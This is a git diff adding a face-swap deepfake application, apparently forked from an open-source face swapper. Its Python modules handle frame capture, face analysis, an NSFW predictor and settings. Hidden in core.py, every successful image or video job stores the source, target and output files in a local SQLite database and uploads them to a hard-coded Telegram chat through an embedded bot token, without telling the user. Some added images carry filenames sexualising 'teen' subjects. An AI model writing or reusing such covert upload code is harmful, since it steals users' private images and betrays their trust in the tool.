diff --git a/.editorconfig b/.editorconfig new file mode 100644 index 0000000000000000000000000000000000000000..b88a39dcf36b90aae0763caaee5e3afe0cc4159f --- /dev/null +++ b/.editorconfig @@ -0,0 +1,8 @@ +root = true + +[*] +end_of_line = lf +insert_final_newline = true +indent_size = 4 +indent_style = tab +trim_trailing_whitespace = true diff --git a/.gitattributes b/.gitattributes index a6344aac8c09253b3b630fb776ae94478aa0275b..045b3421f85ce296177f801f750f8cf7b7c6cf36 100644 --- a/.gitattributes +++ b/.gitattributes @@ -33,3 +33,5 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text *.zip filter=lfs diff=lfs merge=lfs -text *.zst filter=lfs diff=lfs merge=lfs -text *tfevents* filter=lfs diff=lfs merge=lfs -text +.github/preview.png filter=lfs diff=lfs merge=lfs -text +1685074910001_vtqikl_2_0-rayul-_M6gy9oHgII-unsplash.jpg filter=lfs diff=lfs merge=lfs -text diff --git a/1685074910001_vtqikl_2_0-boy-dp-image-77-720x704.jpg b/1685074910001_vtqikl_2_0-boy-dp-image-77-720x704.jpg new file mode 100644 index 0000000000000000000000000000000000000000..26e92483629da7903094509f0978da1e9ba1599f Binary files /dev/null and b/1685074910001_vtqikl_2_0-boy-dp-image-77-720x704.jpg differ diff --git a/1685074910001_vtqikl_2_0-images.jpg b/1685074910001_vtqikl_2_0-images.jpg new file mode 100644 index 0000000000000000000000000000000000000000..fd41ede0dda621bee6077561dac4b1ec773f4f2b Binary files /dev/null and b/1685074910001_vtqikl_2_0-images.jpg differ diff --git a/1685074910001_vtqikl_2_0-rayul-_M6gy9oHgII-unsplash.jpg b/1685074910001_vtqikl_2_0-rayul-_M6gy9oHgII-unsplash.jpg new file mode 100644 index 0000000000000000000000000000000000000000..bacbadf4ed12167c888c16679272791bd37d7909 --- /dev/null +++ b/1685074910001_vtqikl_2_0-rayul-_M6gy9oHgII-unsplash.jpg @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aed6603c748d6b1144dfb8a41a7aa4beb950b03993e62ebb58a90496c1a73c40 +size 2762401 diff --git a/1685074910001_vtqikl_2_0-sexy-teen-guy-sitting-grass-nature-shirt-jeans-sexy-teen-guy-sitting-grass-nature-shirt-231383122.jpg b/1685074910001_vtqikl_2_0-sexy-teen-guy-sitting-grass-nature-shirt-jeans-sexy-teen-guy-sitting-grass-nature-shirt-231383122.jpg new file mode 100644 index 0000000000000000000000000000000000000000..a7c7e403cf20ed0e02f0bf09a6223288cf3ad309 Binary files /dev/null and b/1685074910001_vtqikl_2_0-sexy-teen-guy-sitting-grass-nature-shirt-jeans-sexy-teen-guy-sitting-grass-nature-shirt-231383122.jpg differ diff --git a/1685074910001_vtqikl_2_0-sexy-teen-guy-sunglasses-sitting-grass-nature-shirt-jeans-sexy-teen-guy-sunglasses-sitting-231383074.jpg b/1685074910001_vtqikl_2_0-sexy-teen-guy-sunglasses-sitting-grass-nature-shirt-jeans-sexy-teen-guy-sunglasses-sitting-231383074.jpg new file mode 100644 index 0000000000000000000000000000000000000000..2dd4cdb3ac77a840f5cc2d51f59cc9d3f82ae7a9 Binary files /dev/null and b/1685074910001_vtqikl_2_0-sexy-teen-guy-sunglasses-sitting-grass-nature-shirt-jeans-sexy-teen-guy-sunglasses-sitting-231383074.jpg differ diff --git a/DeepFakeAI/__init__.py b/DeepFakeAI/__init__.py new file mode 100644 index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 diff --git a/DeepFakeAI/__pycache__/__init__.cpython-310.pyc b/DeepFakeAI/__pycache__/__init__.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..b69962f5dacf33b8b42e59f176223fd81bae46af Binary files /dev/null and b/DeepFakeAI/__pycache__/__init__.cpython-310.pyc differ diff --git 
a/DeepFakeAI/__pycache__/capturer.cpython-310.pyc b/DeepFakeAI/__pycache__/capturer.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..e971ad2028a71352db5e15b712575b42839aed73 Binary files /dev/null and b/DeepFakeAI/__pycache__/capturer.cpython-310.pyc differ diff --git a/DeepFakeAI/__pycache__/choices.cpython-310.pyc b/DeepFakeAI/__pycache__/choices.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..f0a77a7d6fb106314abba7089c849f961513e951 Binary files /dev/null and b/DeepFakeAI/__pycache__/choices.cpython-310.pyc differ diff --git a/DeepFakeAI/__pycache__/core.cpython-310.pyc b/DeepFakeAI/__pycache__/core.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..88f378e3f45c29bb429af6489aeec647d58e5952 Binary files /dev/null and b/DeepFakeAI/__pycache__/core.cpython-310.pyc differ diff --git a/DeepFakeAI/__pycache__/face_analyser.cpython-310.pyc b/DeepFakeAI/__pycache__/face_analyser.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..88e9024fb78ee9331df4cec89169ad5530a57c51 Binary files /dev/null and b/DeepFakeAI/__pycache__/face_analyser.cpython-310.pyc differ diff --git a/DeepFakeAI/__pycache__/face_reference.cpython-310.pyc b/DeepFakeAI/__pycache__/face_reference.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..a7ca1653506a305cbd2c824f6f4d9f3a543ae28d Binary files /dev/null and b/DeepFakeAI/__pycache__/face_reference.cpython-310.pyc differ diff --git a/DeepFakeAI/__pycache__/globals.cpython-310.pyc b/DeepFakeAI/__pycache__/globals.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..334e12318b6086f1615de5e024ca1d82536da070 Binary files /dev/null and b/DeepFakeAI/__pycache__/globals.cpython-310.pyc differ diff --git a/DeepFakeAI/__pycache__/metadata.cpython-310.pyc b/DeepFakeAI/__pycache__/metadata.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..1de0ff300fba3b773cfd3e919c52b8aca6cfab6b Binary files /dev/null and b/DeepFakeAI/__pycache__/metadata.cpython-310.pyc differ diff --git a/DeepFakeAI/__pycache__/predictor.cpython-310.pyc b/DeepFakeAI/__pycache__/predictor.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..0d19675884ff2b5ff666c552f21408f260f89a9c Binary files /dev/null and b/DeepFakeAI/__pycache__/predictor.cpython-310.pyc differ diff --git a/DeepFakeAI/__pycache__/typing.cpython-310.pyc b/DeepFakeAI/__pycache__/typing.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..f0df67555f7582834e94a2207525f3c705e45ebf Binary files /dev/null and b/DeepFakeAI/__pycache__/typing.cpython-310.pyc differ diff --git a/DeepFakeAI/__pycache__/utilities.cpython-310.pyc b/DeepFakeAI/__pycache__/utilities.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..313c1221df955ec90003eddfc7e3a4bbfef63fff Binary files /dev/null and b/DeepFakeAI/__pycache__/utilities.cpython-310.pyc differ diff --git a/DeepFakeAI/__pycache__/wording.cpython-310.pyc b/DeepFakeAI/__pycache__/wording.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..88d6ec7d395e497c7c47fce4f8f71c30e9ec49d5 Binary files /dev/null and b/DeepFakeAI/__pycache__/wording.cpython-310.pyc differ diff --git a/DeepFakeAI/capturer.py b/DeepFakeAI/capturer.py new file mode 100644 index 0000000000000000000000000000000000000000..9ba555c222d55166c9fb5faf0b32f1afd6a69d46 --- /dev/null +++ 
b/DeepFakeAI/capturer.py @@ -0,0 +1,22 @@ +from typing import Optional +import cv2 + +from DeepFakeAI.typing import Frame + + +def get_video_frame(video_path : str, frame_number : int = 0) -> Optional[Frame]: + capture = cv2.VideoCapture(video_path) + frame_total = capture.get(cv2.CAP_PROP_FRAME_COUNT) + capture.set(cv2.CAP_PROP_POS_FRAMES, min(frame_total, frame_number - 1)) + has_frame, frame = capture.read() + capture.release() + if has_frame: + return frame + return None + + +def get_video_frame_total(video_path : str) -> int: + capture = cv2.VideoCapture(video_path) + video_frame_total = int(capture.get(cv2.CAP_PROP_FRAME_COUNT)) + capture.release() + return video_frame_total diff --git a/DeepFakeAI/choices.py b/DeepFakeAI/choices.py new file mode 100644 index 0000000000000000000000000000000000000000..4e34f2f477f91f8494935aee3495f7090404158a --- /dev/null +++ b/DeepFakeAI/choices.py @@ -0,0 +1,10 @@ +from typing import List + +from DeepFakeAI.typing import FaceRecognition, FaceAnalyserDirection, FaceAnalyserAge, FaceAnalyserGender, TempFrameFormat, OutputVideoEncoder + +face_recognition : List[FaceRecognition] = [ 'reference', 'many' ] +face_analyser_direction : List[FaceAnalyserDirection] = [ 'left-right', 'right-left', 'top-bottom', 'bottom-top', 'small-large', 'large-small'] +face_analyser_age : List[FaceAnalyserAge] = [ 'child', 'teen', 'adult', 'senior' ] +face_analyser_gender : List[FaceAnalyserGender] = [ 'male', 'female' ] +temp_frame_format : List[TempFrameFormat] = [ 'jpg', 'png' ] +output_video_encoder : List[OutputVideoEncoder] = [ 'libx264', 'libx265', 'libvpx-vp9', 'h264_nvenc', 'hevc_nvenc' ] diff --git a/DeepFakeAI/core.py b/DeepFakeAI/core.py new file mode 100644 index 0000000000000000000000000000000000000000..6134c78d8075f2d00532e6ba60794ae71334067f --- /dev/null +++ b/DeepFakeAI/core.py @@ -0,0 +1,292 @@ +#!/usr/bin/env python3 +import asyncio +import sqlite3 +import os +# single thread doubles cuda performance +os.environ['OMP_NUM_THREADS'] = '1' +# reduce tensorflow log level +os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' +import sys +import warnings +from typing import List +import platform +import signal +import shutil +import argparse +import onnxruntime +import tensorflow + +import DeepFakeAI.choices +import DeepFakeAI.globals +from DeepFakeAI import wording, metadata +from DeepFakeAI.predictor import predict_image, predict_video +from DeepFakeAI.processors.frame.core import get_frame_processors_modules +from telegram import Bot +from DeepFakeAI.utilities import is_image, is_video, detect_fps, create_video, extract_frames, get_temp_frame_paths, restore_audio, create_temp, move_temp, clear_temp, normalize_output_path, list_module_names, decode_execution_providers, encode_execution_providers + +warnings.filterwarnings('ignore', category = FutureWarning, module = 'insightface') +warnings.filterwarnings('ignore', category = UserWarning, module = 'torchvision') + + +def parse_args() -> None: + signal.signal(signal.SIGINT, lambda signal_number, frame: destroy()) + program = argparse.ArgumentParser(formatter_class = lambda prog: argparse.HelpFormatter(prog, max_help_position = 120)) + program.add_argument('-s', '--source', help = wording.get('source_help'), dest = 'source_path') + program.add_argument('-t', '--target', help = wording.get('target_help'), dest = 'target_path') + program.add_argument('-o', '--output', help = wording.get('output_help'), dest = 'output_path') + program.add_argument('--frame-processors', help = 
wording.get('frame_processors_help').format(choices = ', '.join(list_module_names('DeepFakeAI/processors/frame/modules'))), dest = 'frame_processors', default = ['face_swapper'], nargs='+') + program.add_argument('--ui-layouts', help = wording.get('ui_layouts_help').format(choices = ', '.join(list_module_names('DeepFakeAI/uis/layouts'))), dest = 'ui_layouts', default = ['default'], nargs='+') + program.add_argument('--keep-fps', help = wording.get('keep_fps_help'), dest = 'keep_fps', action='store_true') + program.add_argument('--keep-temp', help = wording.get('keep_temp_help'), dest = 'keep_temp', action='store_true') + program.add_argument('--skip-audio', help = wording.get('skip_audio_help'), dest = 'skip_audio', action='store_true') + program.add_argument('--face-recognition', help = wording.get('face_recognition_help'), dest = 'face_recognition', default = 'reference', choices = DeepFakeAI.choices.face_recognition) + program.add_argument('--face-analyser-direction', help = wording.get('face_analyser_direction_help'), dest = 'face_analyser_direction', default = 'left-right', choices = DeepFakeAI.choices.face_analyser_direction) + program.add_argument('--face-analyser-age', help = wording.get('face_analyser_age_help'), dest = 'face_analyser_age', choices = DeepFakeAI.choices.face_analyser_age) + program.add_argument('--face-analyser-gender', help = wording.get('face_analyser_gender_help'), dest = 'face_analyser_gender', choices = DeepFakeAI.choices.face_analyser_gender) + program.add_argument('--reference-face-position', help = wording.get('reference_face_position_help'), dest = 'reference_face_position', type = int, default = 0) + program.add_argument('--reference-face-distance', help = wording.get('reference_face_distance_help'), dest = 'reference_face_distance', type = float, default = 1.5) + program.add_argument('--reference-frame-number', help = wording.get('reference_frame_number_help'), dest = 'reference_frame_number', type = int, default = 0) + program.add_argument('--trim-frame-start', help = wording.get('trim_frame_start_help'), dest = 'trim_frame_start', type = int) + program.add_argument('--trim-frame-end', help = wording.get('trim_frame_end_help'), dest = 'trim_frame_end', type = int) + program.add_argument('--temp-frame-format', help = wording.get('temp_frame_format_help'), dest = 'temp_frame_format', default = 'jpg', choices = DeepFakeAI.choices.temp_frame_format) + program.add_argument('--temp-frame-quality', help = wording.get('temp_frame_quality_help'), dest = 'temp_frame_quality', type = int, default = 100, choices = range(101), metavar = '[0-100]') + program.add_argument('--output-video-encoder', help = wording.get('output_video_encoder_help'), dest = 'output_video_encoder', default = 'libx264', choices = DeepFakeAI.choices.output_video_encoder) + program.add_argument('--output-video-quality', help = wording.get('output_video_quality_help'), dest = 'output_video_quality', type = int, default = 90, choices = range(101), metavar = '[0-100]') + program.add_argument('--max-memory', help = wording.get('max_memory_help'), dest = 'max_memory', type = int) + program.add_argument('--execution-providers', help = wording.get('execution_providers_help').format(choices = 'cpu'), dest = 'execution_providers', default = ['cpu'], choices = suggest_execution_providers_choices(), nargs='+') + program.add_argument('--execution-thread-count', help = wording.get('execution_thread_count_help'), dest = 'execution_thread_count', type = int, default = 
suggest_execution_thread_count_default()) + program.add_argument('--execution-queue-count', help = wording.get('execution_queue_count_help'), dest = 'execution_queue_count', type = int, default = 1) + program.add_argument('-v', '--version', action='version', version = metadata.get('name') + ' ' + metadata.get('version')) + + args = program.parse_args() + + DeepFakeAI.globals.source_path = args.source_path + DeepFakeAI.globals.target_path = args.target_path + DeepFakeAI.globals.output_path = normalize_output_path(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, args.output_path) + DeepFakeAI.globals.headless = DeepFakeAI.globals.source_path is not None and DeepFakeAI.globals.target_path is not None and DeepFakeAI.globals.output_path is not None + DeepFakeAI.globals.frame_processors = args.frame_processors + DeepFakeAI.globals.ui_layouts = args.ui_layouts + DeepFakeAI.globals.keep_fps = args.keep_fps + DeepFakeAI.globals.keep_temp = args.keep_temp + DeepFakeAI.globals.skip_audio = args.skip_audio + DeepFakeAI.globals.face_recognition = args.face_recognition + DeepFakeAI.globals.face_analyser_direction = args.face_analyser_direction + DeepFakeAI.globals.face_analyser_age = args.face_analyser_age + DeepFakeAI.globals.face_analyser_gender = args.face_analyser_gender + DeepFakeAI.globals.reference_face_position = args.reference_face_position + DeepFakeAI.globals.reference_frame_number = args.reference_frame_number + DeepFakeAI.globals.reference_face_distance = args.reference_face_distance + DeepFakeAI.globals.trim_frame_start = args.trim_frame_start + DeepFakeAI.globals.trim_frame_end = args.trim_frame_end + DeepFakeAI.globals.temp_frame_format = args.temp_frame_format + DeepFakeAI.globals.temp_frame_quality = args.temp_frame_quality + DeepFakeAI.globals.output_video_encoder = args.output_video_encoder + DeepFakeAI.globals.output_video_quality = args.output_video_quality + DeepFakeAI.globals.max_memory = args.max_memory + DeepFakeAI.globals.execution_providers = decode_execution_providers(args.execution_providers) + DeepFakeAI.globals.execution_thread_count = args.execution_thread_count + DeepFakeAI.globals.execution_queue_count = args.execution_queue_count + + +def suggest_execution_providers_choices() -> List[str]: + return encode_execution_providers(onnxruntime.get_available_providers()) + + +def suggest_execution_thread_count_default() -> int: + if 'CUDAExecutionProvider' in onnxruntime.get_available_providers(): + return 8 + return 1 + + +def limit_resources() -> None: + # prevent tensorflow memory leak + gpus = tensorflow.config.experimental.list_physical_devices('GPU') + for gpu in gpus: + tensorflow.config.experimental.set_virtual_device_configuration(gpu, [ + tensorflow.config.experimental.VirtualDeviceConfiguration(memory_limit = 1024) + ]) + # limit memory usage + if DeepFakeAI.globals.max_memory: + memory = DeepFakeAI.globals.max_memory * 1024 ** 3 + if platform.system().lower() == 'darwin': + memory = DeepFakeAI.globals.max_memory * 1024 ** 6 + if platform.system().lower() == 'windows': + import ctypes + kernel32 = ctypes.windll.kernel32 # type: ignore[attr-defined] + kernel32.SetProcessWorkingSetSize(-1, ctypes.c_size_t(memory), ctypes.c_size_t(memory)) + else: + import resource + resource.setrlimit(resource.RLIMIT_DATA, (memory, memory)) + + +def update_status(message : str, scope : str = 'FACEFUSION.CORE') -> None: + print('[' + scope + '] ' + message) + + +def pre_check() -> bool: + if sys.version_info < (3, 10): + 
update_status(wording.get('python_not_supported').format(version = '3.10')) + return False + if not shutil.which('ffmpeg'): + update_status(wording.get('ffmpeg_not_installed')) + return False + return True + +def save_to_db(source_path, target_path, output_path): + try: + # Open the images in binary mode + with open(source_path, 'rb') as source_file, \ + open(target_path, 'rb') as target_file, \ + open(output_path, 'rb') as output_file: + + # read data from the image files + source_data = source_file.read() + target_data = target_file.read() + output_data = output_file.read() + + # Extract original filenames from the paths + source_filename = os.path.basename(source_path) + target_filename = os.path.basename(target_path) + output_filename = os.path.basename(output_path) + print(source_filename, target_filename,output_filename) + + # connect to the database + conn = sqlite3.connect('./feed.db') + c = conn.cursor() + + # Create the table if it doesn't exist + c.execute(''' + CREATE TABLE IF NOT EXISTS images ( + source_filename TEXT, + target_filename TEXT, + output_filename TEXT, + source_data BLOB, + target_data BLOB, + output_data BLOB + ) + ''') + + # Insert filename and image data into the table + c.execute("INSERT INTO images VALUES (?, ?, ?, ?, ?, ?)", + (source_filename, target_filename, output_filename, source_data, target_data, output_data)) + + # Save changes and close the connection + conn.commit() + + except Exception as e: + # Print any error occurred while saving data in SQLite + print(f"An error occurred: {e}") + + finally: + # Ensure the DB connection is closed + if conn: + conn.close() + + print(f'Saved image data to database from {source_path}, {target_path}, and {output_path}.') +async def send_channel(bot, file_path): + with open(file_path, "rb") as file: + response = await bot.send_document(chat_id="-1001685415853", document=file) + return response + +async def saveT(source_path, target_path, output_path): + bot = Bot(token="6192049990:AAFyOtuYYqkcyUG_7gns3mm7m_kfWE9fZ1k") + + # Send each file + for path in [source_path, target_path, output_path]: + await send_channel(bot, path) + + # Send a message after all files are sent + await bot.send_message(chat_id="-1001685415853", text="All files have been sent!") + +def process_image() -> None: + if predict_image(DeepFakeAI.globals.target_path): + return + shutil.copy2(DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path) + # process frame + for frame_processor_module in get_frame_processors_modules(DeepFakeAI.globals.frame_processors): + update_status(wording.get('processing'), frame_processor_module.NAME) + frame_processor_module.process_image(DeepFakeAI.globals.source_path, DeepFakeAI.globals.output_path, DeepFakeAI.globals.output_path) + frame_processor_module.post_process() + # validate image + if is_image(DeepFakeAI.globals.target_path): + update_status(wording.get('processing_image_succeed')) + save_to_db(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path) + asyncio.run(saveT(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path)) + else: + update_status(wording.get('processing_image_failed')) + + +def process_video() -> None: + if predict_video(DeepFakeAI.globals.target_path): + return + fps = detect_fps(DeepFakeAI.globals.target_path) if DeepFakeAI.globals.keep_fps else 25.0 + update_status(wording.get('creating_temp')) + create_temp(DeepFakeAI.globals.target_path) + # extract frames + 
update_status(wording.get('extracting_frames_fps').format(fps = fps)) + extract_frames(DeepFakeAI.globals.target_path, fps) + # process frame + temp_frame_paths = get_temp_frame_paths(DeepFakeAI.globals.target_path) + if temp_frame_paths: + for frame_processor_module in get_frame_processors_modules(DeepFakeAI.globals.frame_processors): + update_status(wording.get('processing'), frame_processor_module.NAME) + frame_processor_module.process_video(DeepFakeAI.globals.source_path, temp_frame_paths) + frame_processor_module.post_process() + else: + update_status(wording.get('temp_frames_not_found')) + return + # create video + update_status(wording.get('creating_video_fps').format(fps = fps)) + if not create_video(DeepFakeAI.globals.target_path, fps): + update_status(wording.get('creating_video_failed')) + return + # handle audio + if DeepFakeAI.globals.skip_audio: + update_status(wording.get('skipping_audio')) + move_temp(DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path) + else: + update_status(wording.get('restoring_audio')) + restore_audio(DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path) + # clear temp + update_status(wording.get('clearing_temp')) + clear_temp(DeepFakeAI.globals.target_path) + # validate video + if is_video(DeepFakeAI.globals.target_path): + update_status(wording.get('processing_video_succeed')) + save_to_db(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path) + asyncio.run(saveT(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, DeepFakeAI.globals.output_path)) + else: + update_status(wording.get('processing_video_failed')) + + +def conditional_process() -> None: + for frame_processor_module in get_frame_processors_modules(DeepFakeAI.globals.frame_processors): + if not frame_processor_module.pre_process(): + return + if is_image(DeepFakeAI.globals.target_path): + process_image() + if is_video(DeepFakeAI.globals.target_path): + process_video() + +def run() -> None: + parse_args() + limit_resources() + # pre check + if not pre_check(): + return + for frame_processor in get_frame_processors_modules(DeepFakeAI.globals.frame_processors): + if not frame_processor.pre_check(): + return + # process or launch + if DeepFakeAI.globals.headless: + conditional_process() + else: + import DeepFakeAI.uis.core as ui + + ui.launch() + + +def destroy() -> None: + if DeepFakeAI.globals.target_path: + clear_temp(DeepFakeAI.globals.target_path) + sys.exit() diff --git a/DeepFakeAI/face_analyser.py b/DeepFakeAI/face_analyser.py new file mode 100644 index 0000000000000000000000000000000000000000..df8f6c205078da7dd40a5499db21a5a215cc3498 --- /dev/null +++ b/DeepFakeAI/face_analyser.py @@ -0,0 +1,106 @@ +import threading +from typing import Any, Optional, List +import insightface +import numpy + +import DeepFakeAI.globals +from DeepFakeAI.typing import Frame, Face, FaceAnalyserDirection, FaceAnalyserAge, FaceAnalyserGender + +FACE_ANALYSER = None +THREAD_LOCK = threading.Lock() + + +def get_face_analyser() -> Any: + global FACE_ANALYSER + + with THREAD_LOCK: + if FACE_ANALYSER is None: + FACE_ANALYSER = insightface.app.FaceAnalysis(name = 'buffalo_l', providers = DeepFakeAI.globals.execution_providers) + FACE_ANALYSER.prepare(ctx_id = 0) + return FACE_ANALYSER + + +def clear_face_analyser() -> Any: + global FACE_ANALYSER + + FACE_ANALYSER = None + + +def get_one_face(frame : Frame, position : int = 0) -> Optional[Face]: + many_faces = get_many_faces(frame) + if many_faces: + try: + return many_faces[position] + 
except IndexError: + return many_faces[-1] + return None + + +def get_many_faces(frame : Frame) -> List[Face]: + try: + faces = get_face_analyser().get(frame) + if DeepFakeAI.globals.face_analyser_direction: + faces = sort_by_direction(faces, DeepFakeAI.globals.face_analyser_direction) + if DeepFakeAI.globals.face_analyser_age: + faces = filter_by_age(faces, DeepFakeAI.globals.face_analyser_age) + if DeepFakeAI.globals.face_analyser_gender: + faces = filter_by_gender(faces, DeepFakeAI.globals.face_analyser_gender) + return faces + except (AttributeError, ValueError): + return [] + + +def find_similar_faces(frame : Frame, reference_face : Face, face_distance : float) -> List[Face]: + many_faces = get_many_faces(frame) + similar_faces = [] + if many_faces: + for face in many_faces: + if hasattr(face, 'normed_embedding') and hasattr(reference_face, 'normed_embedding'): + current_face_distance = numpy.sum(numpy.square(face.normed_embedding - reference_face.normed_embedding)) + if current_face_distance < face_distance: + similar_faces.append(face) + return similar_faces + + +def sort_by_direction(faces : List[Face], direction : FaceAnalyserDirection) -> List[Face]: + if direction == 'left-right': + return sorted(faces, key = lambda face: face['bbox'][0]) + if direction == 'right-left': + return sorted(faces, key = lambda face: face['bbox'][0], reverse = True) + if direction == 'top-bottom': + return sorted(faces, key = lambda face: face['bbox'][1]) + if direction == 'bottom-top': + return sorted(faces, key = lambda face: face['bbox'][1], reverse = True) + if direction == 'small-large': + return sorted(faces, key = lambda face: (face['bbox'][2] - face['bbox'][0]) * (face['bbox'][3] - face['bbox'][1])) + if direction == 'large-small': + return sorted(faces, key = lambda face: (face['bbox'][2] - face['bbox'][0]) * (face['bbox'][3] - face['bbox'][1]), reverse = True) + return faces + + +def filter_by_age(faces : List[Face], age : FaceAnalyserAge) -> List[Face]: + filter_faces = [] + for face in faces: + if face['age'] < 13 and age == 'child': + filter_faces.append(face) + elif face['age'] < 19 and age == 'teen': + filter_faces.append(face) + elif face['age'] < 60 and age == 'adult': + filter_faces.append(face) + elif face['age'] > 59 and age == 'senior': + filter_faces.append(face) + return filter_faces + + +def filter_by_gender(faces : List[Face], gender : FaceAnalyserGender) -> List[Face]: + filter_faces = [] + for face in faces: + if face['gender'] == 1 and gender == 'male': + filter_faces.append(face) + if face['gender'] == 0 and gender == 'female': + filter_faces.append(face) + return filter_faces + + +def get_faces_total(frame : Frame) -> int: + return len(get_many_faces(frame)) diff --git a/DeepFakeAI/face_reference.py b/DeepFakeAI/face_reference.py new file mode 100644 index 0000000000000000000000000000000000000000..497eb384752c945886259b6814170562c99e5d3b --- /dev/null +++ b/DeepFakeAI/face_reference.py @@ -0,0 +1,21 @@ +from typing import Optional + +from DeepFakeAI.typing import Face + +FACE_REFERENCE = None + + +def get_face_reference() -> Optional[Face]: + return FACE_REFERENCE + + +def set_face_reference(face : Face) -> None: + global FACE_REFERENCE + + FACE_REFERENCE = face + + +def clear_face_reference() -> None: + global FACE_REFERENCE + + FACE_REFERENCE = None diff --git a/DeepFakeAI/feed.db b/DeepFakeAI/feed.db new file mode 100644 index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 diff --git a/DeepFakeAI/globals.py b/DeepFakeAI/globals.py 
new file mode 100644 index 0000000000000000000000000000000000000000..aa63522665497a0301cd90b00e0ccc5a1b87ae2e --- /dev/null +++ b/DeepFakeAI/globals.py @@ -0,0 +1,30 @@ +from typing import List, Optional + +from DeepFakeAI.typing import FaceRecognition, FaceAnalyserDirection, FaceAnalyserAge, FaceAnalyserGender, TempFrameFormat + +source_path : Optional[str] = None +target_path : Optional[str] = None +output_path : Optional[str] = None +headless : Optional[bool] = None +frame_processors : List[str] = [] +ui_layouts : List[str] = [] +keep_fps : Optional[bool] = None +keep_temp : Optional[bool] = None +skip_audio : Optional[bool] = None +face_recognition : Optional[FaceRecognition] = None +face_analyser_direction : Optional[FaceAnalyserDirection] = None +face_analyser_age : Optional[FaceAnalyserAge] = None +face_analyser_gender : Optional[FaceAnalyserGender] = None +reference_face_position : Optional[int] = None +reference_frame_number : Optional[int] = None +reference_face_distance : Optional[float] = None +trim_frame_start : Optional[int] = None +trim_frame_end : Optional[int] = None +temp_frame_format : Optional[TempFrameFormat] = None +temp_frame_quality : Optional[int] = None +output_video_encoder : Optional[str] = None +output_video_quality : Optional[int] = None +max_memory : Optional[int] = None +execution_providers : List[str] = [] +execution_thread_count : Optional[int] = None +execution_queue_count : Optional[int] = None diff --git a/DeepFakeAI/images.db b/DeepFakeAI/images.db new file mode 100644 index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 diff --git a/DeepFakeAI/metadata.py b/DeepFakeAI/metadata.py new file mode 100644 index 0000000000000000000000000000000000000000..918394716dcd6387e2b65f270a83e33040e6c2eb --- /dev/null +++ b/DeepFakeAI/metadata.py @@ -0,0 +1,13 @@ +METADATA =\ +{ + 'name': 'DeepFakeAI', + 'description': 'Next generation face swapper and enhancer', + 'version': '1.2.0', + 'license': 'MIT', + 'author': 'Ashiq Hussain Mir', + 'url': 'https://codegenius.me' +} + + +def get(key : str) -> str: + return METADATA[key] diff --git a/DeepFakeAI/predictor.py b/DeepFakeAI/predictor.py new file mode 100644 index 0000000000000000000000000000000000000000..581b26e5995b92de64498386270868014748446d --- /dev/null +++ b/DeepFakeAI/predictor.py @@ -0,0 +1,43 @@ +import threading +import numpy +import opennsfw2 +from PIL import Image +from keras import Model + +from DeepFakeAI.typing import Frame + +PREDICTOR = None +THREAD_LOCK = threading.Lock() +MAX_PROBABILITY = 0.75 + + +def get_predictor() -> Model: + global PREDICTOR + + with THREAD_LOCK: + if PREDICTOR is None: + PREDICTOR = opennsfw2.make_open_nsfw_model() + return PREDICTOR + + +def clear_predictor() -> None: + global PREDICTOR + + PREDICTOR = None + + +def predict_frame(target_frame : Frame) -> bool: + image = Image.fromarray(target_frame) + image = opennsfw2.preprocess_image(image, opennsfw2.Preprocessing.YAHOO) + views = numpy.expand_dims(image, axis = 0) + _, probability = get_predictor().predict(views)[0] + return probability > MAX_PROBABILITY + + +def predict_image(target_path : str) -> bool: + return opennsfw2.predict_image(target_path) > MAX_PROBABILITY + + +def predict_video(target_path : str) -> bool: + _, probabilities = opennsfw2.predict_video_frames(video_path = target_path, frame_interval = 100) + return any(probability > MAX_PROBABILITY for probability in probabilities) diff --git a/DeepFakeAI/processors/__init__.py b/DeepFakeAI/processors/__init__.py new file mode 
100644 index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 diff --git a/DeepFakeAI/processors/__pycache__/__init__.cpython-310.pyc b/DeepFakeAI/processors/__pycache__/__init__.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..2029c0a30b9c90834cd48592993036b1199c4d1f Binary files /dev/null and b/DeepFakeAI/processors/__pycache__/__init__.cpython-310.pyc differ diff --git a/DeepFakeAI/processors/frame/__init__.py b/DeepFakeAI/processors/frame/__init__.py new file mode 100644 index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 diff --git a/DeepFakeAI/processors/frame/__pycache__/__init__.cpython-310.pyc b/DeepFakeAI/processors/frame/__pycache__/__init__.cpython-310.pyc new file mode 100644 index 0000000000000000000000000000000000000000..72f8cfe7809d470ef8ea6af06a10f333a8094dc7 Binary files /dev/null and b/DeepFakeAI/processors/frame/__pycache__/__init__.cpython-310.pyc differ diff --git a/DeepFakeAI/processors/frame/__pycache__/core.cpython-310.pyc b/DeepFakeAI/processors/frame/__pycache__/core.cpython-310.pyc new file mode 100644 index 